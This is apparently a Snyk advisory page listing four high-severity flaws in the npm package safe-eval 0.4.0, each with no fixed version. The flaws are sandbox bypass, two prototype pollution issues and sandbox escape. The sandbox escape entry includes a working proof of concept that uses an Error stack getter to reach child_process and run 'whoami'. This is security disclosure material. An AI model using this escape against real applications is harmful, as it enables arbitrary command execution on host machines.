safe-eval@0.4.0 vulnerabilities

Safer version of eval()

Direct Vulnerabilities

Known vulnerabilities in the safe-eval package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free
VulnerabilityVulnerable Version
  • H
Sandbox Bypass

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE").

Vulnerable functions:

__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().

How to fix Sandbox Bypass?

There is no fixed version for safe-eval.

*
  • H
Prototype Pollution

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Prototype Pollution via the safeEval function, due to improper sanitization of its parameter content.

How to fix Prototype Pollution?

There is no fixed version for safe-eval.

*
  • H
Prototype Pollution

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Prototype Pollution which allows an attacker to add or modify properties of the Object.prototype.Consolidate when using the function safeEval. This is because the function uses vm variable, leading an attacker to modify properties of the Object.prototype.

How to fix Prototype Pollution?

There is no fixed version for safe-eval.

*
  • H
Sandbox Escape

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

POC by Anirudh Anand (for node 12.13.0)

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

How to fix Sandbox Escape?

There is no fixed version for safe-eval.

*